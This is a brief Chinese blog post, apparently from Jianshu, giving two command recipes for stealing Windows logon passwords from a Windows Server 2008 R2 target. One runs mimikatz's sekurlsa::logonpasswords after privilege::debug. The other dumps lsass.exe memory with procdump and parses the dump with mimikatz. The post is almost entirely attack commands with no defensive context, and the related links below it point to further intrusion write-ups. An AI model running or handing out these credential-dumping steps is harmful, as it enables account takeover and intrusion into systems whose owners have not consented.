mimikatz抓密码

目标机 windows server 2008 R2

第一种方法:


cmd下运行mimikatz.exe,然后依次输入下面命令

privilege::debug

sekurlsa::logonpasswords

成功抓到服务器密码

第二种方法:

下载个procdump,https://docs.microsoft.com/zh-cn/sysinternals/downloads/procdump,然后

Procdump.exe -accepteula -ma lsass.exe lsass.dmp

mimikatz.exe "sekurlsa::minidump lsass.dmp"

sekurlsa::logonpasswords


©著作权归作者所有,转载或内容合作请联系作者
【社区内容提示】社区部分内容疑似由AI辅助生成,浏览时请结合常识与多方信息审慎甄别。
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

相关阅读更多精彩内容

  • 一次艰难的网站渗透
    信息收集 弱口令登录失败。网站使用帝国cms7.2 弱口令登录失败,使用帝国cms的通用漏洞,失败。在知道绝对路径...
    Tide_诺言阅读 9,959评论 22 56
  • 抓Windows密码的几种方式
    目前大部分抓Windows密码的工具都会被杀软拦截,例如mimikatz,wce,pwdump等,下面介绍几种具有...
    Instu阅读 7,314评论 1 19
  • 批处理学习及实际应用
    个人学习批处理的初衷来源于实际工作;在某个迭代版本有个BS(安卓手游模拟器)大需求,从而在测试过程中就重复涉及到...
    Luckykailiu阅读 4,970评论 0 11
  • Windows系统进程完全解析
    转自https://tieba.baidu.com/p/5231084852 system process 进程文...
    间歇性学习mk阅读 3,679评论 0 5
  • 内网渗透实战(二)
    一直少有机会接触内网渗透实战,最近刚好借助正在参加比赛的大佬施舍的webshell来复习一下。注:本次渗透未授权期...
    RabbitMask阅读 9,022评论 4 56

友情链接更多精彩内容